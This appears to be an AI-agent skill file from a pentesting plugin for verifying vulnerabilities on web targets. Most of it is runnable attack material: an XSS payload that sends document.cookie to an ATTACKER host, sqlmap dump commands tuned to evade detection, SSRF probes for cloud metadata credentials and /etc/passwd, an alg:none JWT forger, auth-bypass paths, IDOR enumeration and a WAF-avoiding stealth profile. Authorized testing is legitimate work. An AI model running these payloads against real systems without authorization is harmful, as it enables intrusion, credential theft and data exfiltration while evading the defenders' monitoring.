From superhackers
Use when:
- a scanner or manual testing has identified a potential vulnerability that needs confirmation
- eliminating false positives from automated scan results
- determining real-world exploitability and impact of a finding
- collecting evidence for a security report
- chaining multiple low-severity issues into a higher-impact attack
- verifying that a patch or remediation actually fixes a vulnerability
```bash
npx claudepluginhub narlyseorg/superhackers --plugin superhackers
```

This skill uses the workspace's default tool permissions.
> **Run `bash $SUPERHACKERS_ROOT/scripts/detect-tools.sh` for tool availability, or read `$SUPERHACKERS_ROOT/TOOLCHAIN.md` for the full resolution protocol.** If a tool is missing, check the fallback chain.
STEALTH CONFIGURATION: To avoid WAF/blocking during verification, source the stealth profile before testing:

```bash
bash $SUPERHACKERS_ROOT/scripts/stealth-profile.sh && eval "$(stealth_curl_headers)"
```

See `skills/stealth-techniques/SKILL.md` for the comprehensive stealth methodology.
| Tool | Required | Fallback | Install |
|---|---|---|---|
| curl | ✅ Yes | wget → python3 requests | Usually pre-installed |
| nuclei | ✅ Yes | nikto → manual curl verification | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| sqlmap | ⚡ Optional | manual curl injection payloads | pip3 install sqlmap |
| nikto | ⚡ Optional | nuclei → manual curl | brew install nikto / apt install nikto |
| BurpSuite | ⚡ Optional | mitmproxy (proxy) → curl direct | Commercial — install from portswigger.net |
| rg (ripgrep) | ⚡ Optional | grep → grep -E | brew install ripgrep / apt install ripgrep |
Cross-Platform Notes:
- macOS: Install GNU coreutils for the `timeout` command: `brew install coreutils` (provides `gtimeout`)
- Linux/WSL: the `timeout` command is available by default
- All platforms: scripts use fallbacks if preferred tools are unavailable
Before running any commands in this skill:
- Run `bash $SUPERHACKERS_ROOT/scripts/detect-tools.sh` if not already run this session
- For any ❌ missing tool, use the fallback from the chain above
Add these functions to your shell session or script for cross-platform compatibility:
```bash
# Cross-platform timeout wrapper
run_with_timeout() {
    local seconds="$1"
    shift
    if command -v timeout >/dev/null 2>&1; then
        timeout "$seconds" "$@"
    elif command -v gtimeout >/dev/null 2>&1; then
        gtimeout "$seconds" "$@"
    else
        # Perl fallback for macOS without coreutils
        perl -e 'use POSIX qw(SIGALRM); alarm shift; exec @ARGV or die "$!"' "$seconds" "$@"
    fi
}

# Cross-platform grep wrapper
search_text() {
    if command -v rg >/dev/null 2>&1; then
        rg "$@"
    else
        grep -E "$@"
    fi
}
```
CRITICAL: If SUPERHACKERS_ROOT is not set, auto-detect it first
```bash
# Auto-detect SUPERHACKERS_ROOT if not set
if [ -z "${SUPERHACKERS_ROOT:-}" ]; then
    # Try common plugin cache paths (globs must sit outside the quotes to expand)
    for path in \
        "$HOME/.claude/plugins/cache/superhackers/superhackers/"1.2.* \
        "$HOME/.claude/plugins/cache/superhackers/superhackers/"* \
        "$HOME/superhackers" \
        "$(pwd)/superhackers"; do
        if [ -d "$path" ] && [ -f "$path/scripts/detect-tools.sh" ]; then
            export SUPERHACKERS_ROOT="$path"
            echo "Auto-detected SUPERHACKERS_ROOT=$SUPERHACKERS_ROOT"
            break
        fi
    done
fi

# Verify detection worked
if [ -z "${SUPERHACKERS_ROOT:-}" ] || [ ! -f "$SUPERHACKERS_ROOT/scripts/detect-tools.sh" ]; then
    echo "ERROR: SUPERHACKERS_ROOT not set and auto-detection failed"
    echo "Please set: export SUPERHACKERS_ROOT=/path/to/superhackers"
    return 1   # use exit 1 if running as a standalone script
fi
```
MANDATORY: All verification commands MUST follow this protocol:
Timeout on verification requests: Don't hang on non-responsive targets
```bash
# Standard timeout for manual verification (15 seconds)
run_with_timeout 15 curl -s -X POST https://target.com/api/test

# Longer timeout for nuclei re-verification (30 seconds)
run_with_timeout 30 nuclei -u https://target.com -id vuln-id
```
Validate vulnerability confirmation
```bash
OUTPUT=$(run_with_timeout 15 curl -s -X POST \
    -H "Content-Type: application/json" \
    -d '{"test": "payload"}' \
    -w "\n%{http_code}" \
    https://target.com/vulnerable-endpoint 2>&1)
EXIT_CODE=$?
HTTP_CODE=$(echo "$OUTPUT" | tail -1)
BODY=$(echo "$OUTPUT" | sed '$d')   # head -n -1 is GNU-only; sed '$d' is portable

# Note: timeout/gtimeout return 124 on timeout; the perl fallback dies via
# SIGALRM, which surfaces as exit code 142
if [ "$EXIT_CODE" -eq 124 ] || [ "$EXIT_CODE" -eq 142 ]; then
    echo "TOOL_FAILURE: Verification timeout after 15 seconds"
    echo "RESULT: Unable to confirm vulnerability (target unresponsive)"
    # Mark as requiring manual verification
elif [ "$EXIT_CODE" -ne 0 ]; then
    echo "TOOL_FAILURE: curl failed with exit code $EXIT_CODE"
    # Try fallback method
fi

# Check for vulnerability indicators (cross-platform)
case "$HTTP_CODE" in
    200)
        if echo "$BODY" | search_text -q "error|mysql|syntax"; then
            echo "CONFIRMED: Vulnerability verified - injection reflected in response"
        else
            echo "INCONCLUSIVE: Request succeeded but no clear vulnerability indicator"
        fi
        ;;
    400|403|404)
        echo "RESULT: Vulnerability appears mitigated (blocked by security controls)"
        ;;
    000)
        echo "TOOL_FAILURE: Connection failed during verification"
        ;;
esac
```
Retry logic for verification
```bash
# Max 3 verification attempts
# Attempt 1: Direct payload testing
# Attempt 2: Modified payload (encoded variants)
# Attempt 3: Alternative verification method
```
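The three-attempt ladder can be sketched as a loop; the `verify_*` hooks below are hypothetical placeholders — wire each one to the actual curl/nuclei command for the finding under test:

```bash
# Run up to 3 verification attempts, escalating payload sophistication.
# verify_direct / verify_encoded / verify_alternative are assumed hooks.
verify_with_retries() {
    local attempt=1 method
    for method in verify_direct verify_encoded verify_alternative; do
        echo "Attempt $attempt: $method"
        if "$method"; then
            echo "CONFIRMED on attempt $attempt"
            return 0
        fi
        attempt=$((attempt + 1))
    done
    echo "Not confirmed after 3 attempts"
    return 1
}
```

Stopping at the first success keeps the evidence tied to the simplest payload that works, which makes reproduction steps cleaner.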
Fallback for nuclei-based verification
```bash
# Primary: nuclei with specific template
run_with_timeout 30 nuclei -u https://target.com -id vuln-template 2>/dev/null
if [ $? -ne 0 ]; then
    echo "FALLBACK: nuclei failed, trying nikto"
    run_with_timeout 30 nikto -h https://target.com
    if [ $? -ne 0 ]; then
        echo "FALLBACK: Manual curl-based verification"
        # Manual verification with curl
    fi
fi
```
Vulnerability verification is the critical bridge between "scanner says vulnerable" and "confirmed exploitable with X impact." Most scanners produce 30-70% false positives. This skill covers the methodology for confirming vulnerabilities, eliminating noise, assessing real impact, collecting court-grade evidence, and demonstrating exploitability without causing damage.
- **Position:** Phase 4 (Verification) — after testing skills, before `writing-security-reports`
- **Expected Input:** Raw findings from testing skills (`webapp-pentesting`, `api-pentesting`, `infra-pentesting`, etc.)
- **Your Output:** Verified findings with evidence, confidence levels, and classification (Confirmed / Mitigated / False Positive / Out of Scope)
- **Consumed By:** `exploit-development` (for confirmed vulns needing PoC), `writing-security-reports` (for the final report)
- **Critical:** Unverified findings must NOT reach the final report. You are the quality gate.
Every finding in a pentest report must be verified, reproducible, and evidenced. Unverified findings destroy credibility.
REQUIRED SUB-SKILL: Use superhackers:exploit-development when custom exploit code is needed to confirm a vulnerability.
```
1. INITIAL TRIAGE
   ├── Review scanner output (severity, confidence, details)
   ├── Understand the vulnerability class
   ├── Assess likelihood of false positive
   └── Prioritize: Critical/High first, then Medium, then Low

2. MANUAL CONFIRMATION
   ├── Reproduce the finding manually
   ├── Verify across different conditions (auth levels, browsers, methods)
   ├── Determine root cause
   └── Confirm it's not a false positive

3. IMPACT ASSESSMENT
   ├── Determine what an attacker can achieve
   ├── Test exploitability boundaries (scope, data access, privilege level)
   ├── Identify affected users/data/systems
   └── Consider chaining with other findings

4. EVIDENCE COLLECTION
   ├── Capture HTTP request/response pairs
   ├── Take screenshots of exploitation
   ├── Record command output
   ├── Document step-by-step reproduction
   └── Sanitize sensitive data in evidence

5. SEVERITY SCORING
   ├── Calculate CVSS base score
   ├── Apply temporal and environmental adjustments
   ├── Map to organizational risk rating
   └── Justify severity with evidence

6. DOCUMENTATION → Feed into report
```
Before applying the Verification Decision Matrix, assess your confidence level:
| Level | Criteria | Action |
|---|---|---|
| HIGH | Exploit succeeded, response proves impact, reproduced 2+ times | Apply Verification Decision Matrix directly |
| MEDIUM | Behavior suggests vulnerability but compensating control may exist, or reproduced only once | Downgrade one severity level from matrix result |
| LOW | Theoretical only — inferred from code/config but not confirmed via live testing | Mark "Needs Investigation" regardless of scanner severity |
Rule: When uncertain between two confidence levels, round DOWN. False positives destroy credibility faster than missed findings.
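The round-DOWN rule is mechanical enough to encode; a minimal sketch, assuming severity names match your report template:

```bash
# Downgrade one severity level — applied to MEDIUM-confidence findings
# per the round-DOWN rule above.
downgrade_severity() {
    case "$1" in
        Critical) echo "High" ;;
        High)     echo "Medium" ;;
        Medium)   echo "Low" ;;
        Low|Info) echo "Info" ;;
        *)        echo "Unknown" ;;
    esac
}
```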
ABSOLUTE RULE: Every finding must exit verification in one of exactly six states: CONFIRMED, FALSE POSITIVE, MITIGATED, OUT OF SCOPE, INCONCLUSIVE, or TOOLS_UNVERIFIABLE. "Not confirmed", "Possible", "Maybe", "TBD", and "Needs investigation" are FORBIDDEN as final states in any deliverable. A finding stuck in INVESTIGATE state is an INCOMPLETE finding — the engagement is not done until it resolves.
| Scanner says | Manual test | Verdict |
|---|---|---|
| Critical/High | Reproduces | CONFIRMED — document immediately |
| Critical/High | Doesn't repro | Investigate deeper — may need auth/conditions |
| Medium | Reproduces | CONFIRMED — assess real impact |
| Medium | Doesn't repro | Likely false positive — note and move on |
| Low/Info | Reproduces | CONFIRMED — check if chainable |
| Low/Info | Doesn't repro | FALSE POSITIVE — discard |
| Any | Partially works | INVESTIGATE — apply Bypass Exhaustion Protocol; must resolve to a final state |
Final State Definitions:
| State | Meaning | Evidence Required |
|---|---|---|
| CONFIRMED | Vulnerability exists and is exploitable | Reproduction steps + request/response evidence |
| FALSE POSITIVE | Tool fired incorrectly; vulnerability does not exist | Evidence showing the vulnerable code path does not execute |
| MITIGATED | Vulnerability exists but a control prevents exploitation | Control identified (WAF rule, input validation, param query) + bypass attempts documented |
| OUT OF SCOPE | Endpoint/target not within agreed engagement scope | Scope definition reference |
| INCONCLUSIVE | Multiple vantage points tested; a specific external constraint prevents definitive conclusion | Network-layer evidence: exact error type (timeout vs ICMP unreachable vs RST vs WAF 403), source IP used, at minimum 2 different vantage points attempted |
| TOOLS_UNVERIFIABLE | All primary and fallback tools failed; cannot execute the test | All tools attempted + specific failure for each: crash output, error code, or "not installed" + remediation steps to unblock |
TOOLS_UNVERIFIABLE is only permitted when ALL of the following are true:
- The primary tool AND all fallback tools from the tool chain were attempted
- Each failure is documented with specific error output (not "tool failed")
- You have attempted to install or substitute an alternative (e.g., Python script for curl)
- The failure is environmental (tool unavailable, dependency missing) — not a network issue (which → INCONCLUSIVE)
A finding marked TOOLS_UNVERIFIABLE must include: "Re-verify when [specific tool] is available."
INCONCLUSIVE is only permitted when ALL of the following are true:
- You tested from at least 2 distinct network vantage points (different IPs, different exit regions)
- You documented the specific network-layer behavior (not "likely blocked" — specific: "TCP SYN timeout after 30s from vantage 1; ICMP port-unreachable type 3 from vantage 2")
- You applied all 3+ bypass techniques from the Bypass Exhaustion Protocol
- The block cannot be attributed to a testable security control (if it can, classify as MITIGATED)
"Inconclusive — likely blocked at network level" without specific evidence is FORBIDDEN. It is the same failure mode as "Not confirmed."
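curl's exit codes already distinguish most of the network-layer behaviors this evidence standard requires (28 = operation timeout, 7 = connection refused, 6 = DNS failure, per the curl man page); a sketch for recording them per vantage point:

```bash
# Classify a probe's network-layer outcome for INCONCLUSIVE evidence.
# Usage: classify_probe <curl_exit_code> <http_code>
classify_probe() {
    local exit_code="$1" http_code="$2"
    if [ "$exit_code" -eq 28 ]; then
        echo "TCP timeout (silent drop / filtered)"
    elif [ "$exit_code" -eq 7 ]; then
        echo "Connection refused (RST or unreachable)"
    elif [ "$exit_code" -eq 6 ]; then
        echo "DNS resolution failure"
    elif [ "$exit_code" -eq 0 ] && [ "$http_code" = "403" ]; then
        echo "HTTP 403 (testable control in play — consider MITIGATED, not INCONCLUSIVE)"
    else
        echo "exit=$exit_code http=$http_code (inspect manually)"
    fi
}
```

Capture one classified line per vantage point; that is exactly the "specific network-layer behavior" the rule above demands.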
Before verifying any finding from an automated scanner, confirm the scanner actually produced valid output:
```bash
bash $SUPERHACKERS_ROOT/scripts/validate-output.sh <scanner_name> <output_file> <exit_code>
```
If VALIDATION=failed for the scanner that produced the finding, the finding itself is UNRELIABLE. Re-run the scanner with corrected configuration before attempting verification. Do NOT mark a finding as "False Positive" just because the verification scan produced empty output — that's a tool failure, not a verification result.
CRITICAL — Tool Failure vs. Test Result (NON-NEGOTIABLE):
| Situation | Classification | Action |
|---|---|---|
| Tool ran, produced output, showed no vulnerability | Not Vulnerable | Document the tool command, output summary, conclusion |
| Tool ran, output empty/no-output-file | Tool Failure | Re-run; cannot be reported as any test result |
| Tool timed out, no output | Tool Failure | Re-run with reduced scope/timeout; cannot be reported |
| Tool crashed (non-zero exit, empty stderr) | Tool Failure | Switch to fallback tool; cannot be reported |
| Tool ran, output shows partial coverage | Incomplete | Re-run covering missing scope; cannot be reported as complete |
"A tool timed out therefore this is Not Confirmed" is a category error. Timeout = tool failure = re-run required. The only acceptable report entry from a tool failure is "Test not completed due to tool failure — see [engagement notes] for re-run status."
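The table above reduces to a small decision function; a sketch, assuming you captured the tool's exit code and output file path:

```bash
# Classify a tool run per the Tool Failure vs. Test Result table.
# Usage: classify_tool_run <exit_code> <output_file>
classify_tool_run() {
    local exit_code="$1" output_file="$2"
    if [ "$exit_code" -eq 124 ]; then
        echo "TOOL_FAILURE: timed out — re-run with reduced scope; cannot be reported"
    elif [ ! -s "$output_file" ]; then
        echo "TOOL_FAILURE: empty or missing output — re-run; not a test result"
    elif [ "$exit_code" -ne 0 ]; then
        echo "TOOL_FAILURE: crashed (exit $exit_code) — switch to fallback tool"
    else
        echo "RAN_OK: inspect output before drawing any conclusion"
    fi
}
```

Note that `RAN_OK` is not "Not Vulnerable" — that conclusion still requires a human read of the output.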
Component/Plugin Version Enumeration Completeness: check `?ver=` artifacts and response header patterns.

Before classifying ANY finding as False Positive, you MUST complete all of the following:

1. Attempt 3+ distinct bypass techniques appropriate to the vulnerability class
2. Escalate methodology: manual testing (curl/browser) → automated tool (sqlmap/ffuf/nuclei) → custom payload crafted for the specific context
3. Apply the control-vs-constraint question

Only then may you classify as False Positive — meaning the vulnerability genuinely does not exist.
Critical distinction: Mitigated ≠ False Positive.
```bash
# Re-run nuclei with specific template for a finding
nuclei -u https://target.com -t /path/to/specific-template.yaml -debug

# Nikto — targeted scan for specific checks
nikto -h https://target.com -Tuning x

# Manual HTTP request verification with curl
curl -v -k https://target.com/vulnerable-endpoint

# Proxy through BurpSuite for detailed analysis
curl -v -k --proxy http://127.0.0.1:8080 https://target.com/vulnerable-endpoint

# Test with different HTTP methods
for method in GET POST PUT DELETE PATCH OPTIONS HEAD; do
    echo "=== $method ==="
    curl -s -o /dev/null -w "%{http_code}" -X $method https://target.com/endpoint
done
```
Goal: Prove script execution in victim's browser context, not just alert(1).
```bash
# Step 1: Reproduce the scanner finding
# Inject the exact payload the scanner used — check if it executes

# Step 2: Determine XSS type
# Reflected: payload in URL/request, reflected in response
curl -s "https://target.com/search?q=<script>alert(1)</script>" | search_text -i "script"

# Stored: payload persisted, appears on subsequent page loads
# Submit payload, then visit the page without the payload in URL

# DOM-based: payload processed by client-side JavaScript
# Check page source — if injection point is in JS context, it's DOM-based

# Step 3: Prove real impact (not just alert box)
# Cookie access proof
<script>fetch('https://ATTACKER/steal?c='+document.cookie)</script>

# Session token accessible?
<script>document.write('<p>Cookie: '+document.cookie+'</p>')</script>

# DOM manipulation proof (shows attacker control)
<script>document.body.innerHTML='<h1>XSS by Tester</h1>'</script>

# Step 4: Test filter bypasses if initial payload blocked
# See exploit-development skill for bypass payloads

# Step 5: Evidence collection
# Screenshot 1: The request containing the XSS payload
# Screenshot 2: The response/rendered page showing execution
# Screenshot 3: Proof of cookie access or DOM control
# Save full HTTP request and response

# Step 6: Determine scope
# HttpOnly flag on session cookie? → limits cookie theft but DOM control still severe
# CSP header present? → may limit script execution
curl -s -I https://target.com | search_text -i "content-security-policy|x-xss-protection|set-cookie"
```
XSS Severity Guide:
| Scenario | CVSS Impact | Notes |
|---|---|---|
| Reflected, self-XSS only | Low (3.1-3.9) | Requires victim to click crafted link |
| Reflected, cookie theft possible | Medium (5.4-6.1) | No HttpOnly, session hijack possible |
| Stored XSS, any user sees it | High (6.1-8.0) | Persistent, affects all visitors |
| Stored XSS + admin context | Critical (8.0-9.0) | Can lead to full application takeover |
| DOM XSS + no CSP | Medium-High (5.4-7.5) | Depends on context and data access |
Goal: Prove data extraction capability, not just error messages.
```bash
# Step 1: Confirm error-based SQLi
curl -s "https://target.com/page?id=1'" | search_text -i "sql|syntax|mysql|postgres|oracle|sqlite"

# Step 2: Confirm boolean-based blind SQLi (spaces URL-encoded — curl will
# not send a valid request line with raw spaces in the URL)
# True condition — normal response
curl -s "https://target.com/page?id=1%20AND%201%3D1" -o true.html
# False condition — different response
curl -s "https://target.com/page?id=1%20AND%201%3D2" -o false.html
# Compare
diff true.html false.html

# Step 3: Confirm time-based blind SQLi
# Delayed response = injectable
time curl -s "https://target.com/page?id=1;%20WAITFOR%20DELAY%20'0:0:5'--"
time curl -s "https://target.com/page?id=1'%20AND%20SLEEP(5)--+"

# Step 4: Prove data extraction with sqlmap
sqlmap -u "https://target.com/page?id=1" --batch --technique=BEUSTQ --dbs \
    --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
    --delay=2-5 --randomize --threads=1

# Step 5: Extract a sample of data (NOT full dump in verification phase)
sqlmap -u "https://target.com/page?id=1" --batch -D database_name -T users --dump --limit 3 \
    --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
    --delay=2-5 --randomize --threads=1

# Step 6: Check privilege level
sqlmap -u "https://target.com/page?id=1" --batch --current-user --is-dba --privileges \
    --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
    --delay=2-5 --randomize --threads=1

# Step 7: Evidence collection
# Save: the vulnerable parameter, the sqlmap output, sample extracted data
# Sanitize: redact actual passwords/PII from evidence — show structure not content

# Step 8: Test with proxy for clean request/response capture
sqlmap -u "https://target.com/page?id=1" --proxy="http://127.0.0.1:8080" --batch --dbs \
    --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
    --delay=2-5 --randomize --threads=1
```
SQLi Severity Guide:
| Scenario | CVSS Impact | Notes |
|---|---|---|
| Error-based, no data extraction | Medium (4.3-5.3) | Information disclosure only |
| Blind SQLi, data extractable | High (7.5-8.6) | Full DB read access |
| SQLi with DBA privileges | Critical (8.6-9.8) | OS command exec, file read/write |
| SQLi with stacked queries | Critical (9.0-9.8) | Full DB control, data modification |
Goal: Prove internal network access or cloud metadata retrieval.
```bash
# Step 1: Test basic SSRF — does the server make outbound requests?
# Use a webhook/callback service to confirm
curl -s "https://target.com/fetch?url=https://ATTACKER_WEBHOOK/"
# Check webhook for incoming request from target's IP

# Step 2: Test internal network access
curl -s "https://target.com/fetch?url=http://127.0.0.1:80"
curl -s "https://target.com/fetch?url=http://127.0.0.1:22"
curl -s "https://target.com/fetch?url=http://192.168.1.1/"

# Step 3: Test cloud metadata access (CRITICAL)
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"

# Step 4: Test filter bypasses if basic URLs blocked
curl -s "https://target.com/fetch?url=http://0x7f000001/"        # Hex IP
curl -s "https://target.com/fetch?url=http://2130706433/"        # Decimal IP
curl -s "https://target.com/fetch?url=http://127.1/"             # Short form
curl -s "https://target.com/fetch?url=http://[::1]/"             # IPv6 loopback
curl -s "https://target.com/fetch?url=http://127.0.0.1.nip.io/"  # DNS rebinding

# Step 5: Test protocol handlers
curl -s "https://target.com/fetch?url=file:///etc/passwd"
curl -s "https://target.com/fetch?url=dict://127.0.0.1:6379/info"
curl -s "https://target.com/fetch?url=gopher://127.0.0.1:6379/_INFO"

# Step 6: Internal port scan via SSRF (prove scope of access)
for port in 22 80 443 3306 5432 6379 8080 9200 27017; do
    resp=$(curl -s -o /dev/null -w "%{http_code}:%{time_total}" \
        "https://target.com/fetch?url=http://127.0.0.1:$port" --max-time 5)
    echo "Port $port: $resp"
done

# Step 7: Evidence
# Save: vulnerable endpoint, proof of internal access, metadata retrieved
# Critical evidence: cloud credentials, internal service banners, file contents
```
Goal: Prove unauthorized access to another user's resources.
```bash
# Step 1: Identify the pattern
# User A accesses: GET /api/users/100/profile
# Change to User B: GET /api/users/101/profile

# Step 2: Test horizontal privilege escalation
# Authenticated as User A (ID=100)
curl -s -H "Authorization: Bearer TOKEN_A" "https://target.com/api/users/100/profile"
# Try accessing User B's data (ID=101)
curl -s -H "Authorization: Bearer TOKEN_A" "https://target.com/api/users/101/profile"

# Step 3: Test vertical privilege escalation
# Regular user trying admin endpoints
curl -s -H "Authorization: Bearer REGULAR_TOKEN" "https://target.com/api/admin/users"
curl -s -H "Authorization: Bearer REGULAR_TOKEN" "https://target.com/api/admin/settings"

# Step 4: Test with no authentication
curl -s "https://target.com/api/users/100/profile"

# Step 5: Test predictable IDs
# Sequential: 100, 101, 102, ...
# UUID: try known UUIDs from other endpoints or leaked data

# Step 6: Evidence collection
# Screenshot showing: request as User A → response with User B's data
# Compare: response for own data vs response for other user's data
# Critical: show DIFFERENT data returned, proving cross-user access

# Step 7: Assess scope
# How many records accessible? (enumerate a range)
for id in $(seq 1 10); do
    code=$(curl -s -o /dev/null -w "%{http_code}" \
        -H "Authorization: Bearer TOKEN_A" \
        "https://target.com/api/users/$id/profile")
    echo "ID $id: HTTP $code"
done
```
```bash
# Step 1: Test direct access to protected endpoints without auth
curl -s "https://target.com/admin/dashboard"
curl -s "https://target.com/api/admin/users"

# Step 2: Test with manipulated tokens/cookies
# Remove auth header entirely
curl -s "https://target.com/api/protected-endpoint"
# Empty auth header
curl -s -H "Authorization: " "https://target.com/api/protected-endpoint"
# Manipulated JWT (change role claim)
# Decode JWT, modify payload, re-encode (without signature for alg:none)

# Step 3: Test HTTP method override
curl -s -X POST "https://target.com/admin/dashboard"
curl -s -H "X-HTTP-Method-Override: GET" -X POST "https://target.com/admin/dashboard"

# Step 4: Test path traversal to bypass auth
curl -s "https://target.com/admin/../admin/dashboard"
curl -s "https://target.com/ADMIN/dashboard"
curl -s "https://target.com/admin/./dashboard"
curl -s "https://target.com/%61dmin/dashboard"

# Step 5: Evidence
# Show: request without valid auth → response with protected content
# Compare: authenticated admin response vs bypass response
```
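The `alg:none` manipulation from Step 2 can be sketched with standard tools; the claim values below are illustrative, and base64url is built from plain `base64` plus `tr`:

```bash
# Forge an unsigned JWT with alg:none and an elevated role claim.
b64url() { base64 | tr -d '=\n' | tr '+/' '-_'; }

header=$(printf '%s' '{"alg":"none","typ":"JWT"}' | b64url)
payload=$(printf '%s' '{"sub":"100","role":"admin"}' | b64url)
token="${header}.${payload}."   # trailing dot: empty signature section

# Replay sketch (hypothetical endpoint):
#   curl -s -H "Authorization: Bearer $token" "https://target.com/api/admin/users"
echo "$token"
```

A server that accepts this token has a critical signature-validation flaw; a 401/403 here is itself useful evidence that `alg:none` is rejected.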
```yaml
# Custom template to verify a specific finding
id: custom-ssrf-verification

info:
  name: SSRF Verification - Internal Metadata Access
  author: pentest-team
  severity: critical
  description: Verifies SSRF allows access to cloud instance metadata
  tags: ssrf,custom,verification

requests:
  - method: GET
    path:
      - "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ami-id"
          - "instance-id"
          - "security-credentials"
        condition: or
      - type: status
        status:
          - 200
  - method: GET
    path:
      - "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    matchers:
      - type: regex
        regex:
          - "[A-Z0-9]{20}" # AWS access key pattern
```
```yaml
# Template for verifying SQL injection
id: custom-sqli-verification

info:
  name: SQLi Verification - Error Based
  author: pentest-team
  severity: high
  description: Confirms SQL injection via error-based technique
  tags: sqli,custom,verification

requests:
  - method: GET
    path:
      - "{{BaseURL}}/page?id=1'"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SQL syntax"
          - "mysql_fetch"
          - "ORA-"
          - "PostgreSQL"
          - "sqlite3"
          - "ODBC"
          - "unclosed quotation"
        condition: or
      - type: status
        status:
          - 200
          - 500
```
```bash
# Run custom verification templates
nuclei -u https://target.com -t custom-templates/ -debug -proxy http://127.0.0.1:8080
```
```
COMMON FALSE POSITIVE PATTERNS:

1. Version-based detection only
   Scanner: "Apache 2.4.49 — CVE-2021-41773 Path Traversal"
   Reality: May be patched via backport, or .htaccess mitigates
   Action:  Test manually: curl https://target/cgi-bin/.%2e/.%2e/etc/passwd

2. Header-based detection
   Scanner: "Missing X-Frame-Options"
   Reality: CSP frame-ancestors may be set instead
   Action:  Check full response headers, look for CSP

3. Generic template matches
   Scanner: "Potential open redirect"
   Reality: Redirect is to same domain, or parameterized within app
   Action:  Test with external domain: ?redirect=https://evil.com

4. WAF/proxy interference
   Scanner: "Blind XSS detected (reflection found)"
   Reality: WAF stripped dangerous characters, only benign text reflected
   Action:  Check if script actually executes in browser

5. Authenticated vs unauthenticated
   Scanner: "Sensitive data exposure at /api/users"
   Reality: Endpoint requires valid authentication
   Action:  Test without auth token — confirm 401/403

6. Rate-limiting obscuring results
   Scanner: "Multiple vulnerabilities detected"
   Reality: WAF started blocking after N requests, returning error pages
   Action:  Re-test individual findings at low rate

ELIMINATION CHECKLIST:
□ Can I reproduce manually?
□ Does the response actually contain exploitable output?
□ Is the behavior consistent across multiple attempts?
□ Does it work without scanner-specific headers/conditions?
□ Am I testing the application or a proxy/WAF/CDN?
```
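For the last checklist item, a quick heuristic helps: fingerprint the response body for block-page markers before treating it as application output. The fingerprint list below is an assumption — extend it for the WAF/CDN actually in front of your target:

```bash
# Heuristic: does a saved response body look like a WAF/CDN block page
# rather than the application's own output?
is_waf_page() {
    grep -qiE 'cloudflare|akamai|incapsula|imperva|request blocked|access denied|mod_security' "$1"
}

# Usage sketch (hypothetical target):
#   curl -s "https://target.com/page?id=1'" -o resp.html
#   if is_waf_page resp.html; then echo "WAF response — not a database error"; fi
```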
```
IMPACT PROOF GUIDELINES:

1. DATA ACCESS — Prove what data is accessible
   - Extract 3-5 sample records, not full tables
   - Redact PII in screenshots (blur SSN, CC, passwords)
   - Show record count: "3,847,291 records accessible"
   - Show column names to demonstrate data types at risk

2. PRIVILEGE ESCALATION — Prove the access level gained
   - Show the username/role of the compromised context
   - Demonstrate one admin action (read admin page, not delete data)
   - Show what COULD be done vs what WAS done

3. REMOTE CODE EXECUTION — Prove command execution
   - Run: id, whoami, hostname (harmless commands only)
   - Show network access: ifconfig/ipconfig
   - NEVER: rm, format, delete, modify production data
   - NEVER: install backdoors outside scope

4. SSRF — Prove internal access
   - Read metadata endpoint
   - Port scan localhost
   - NEVER: actually use stolen cloud credentials
   - Document credential format to prove access level

5. CHAIN EXPLOITATION — Show combined impact
   - Document each step of the chain
   - Show how Low + Low = High
   - Example: Info disclosure → credential access → admin takeover
```
CVSS v4.0 BASE SCORE COMPONENTS:
CVSS 4.0 uses a lookup-based algorithm rather than a simple formula with
individual metric weights. Use the FIRST calculator or Python cvss library
for accurate scores.
| Metric | Values | Description |
|--------|--------|-------------|
| AV | N, A, L, P | Attack Vector |
| AC | L, H | Attack Complexity |
| AT | N, P | Attack Requirements (NEW) |
| PR | N, L, H | Privileges Required |
| UI | N, P, A | User Interaction (changed: P=passive, A=active) |
| VC | H, L, N | Confidentiality impact on vulnerable system |
| VI | H, L, N | Integrity impact on vulnerable system |
| VA | H, L, N | Availability impact on vulnerable system |
| SC | H, L, N | Confidentiality impact on subsequent systems |
| SI | H, L, N | Integrity impact on subsequent systems |
| SA | H, L, N | Availability impact on subsequent systems |
COMMON VULNERABILITY CVSS MAPPINGS:
```
Unauthenticated RCE:         CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N = 9.3
Auth bypass to admin:        CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N = 9.3
Unauthenticated SQLi (data): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N = 8.7
Stored XSS (any user):       CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.1
Reflected XSS:               CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.3
IDOR (read other user data): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N = 7.1
SSRF (internal access):      CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N = 7.7
SSRF (metadata creds):       CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H = 9.3
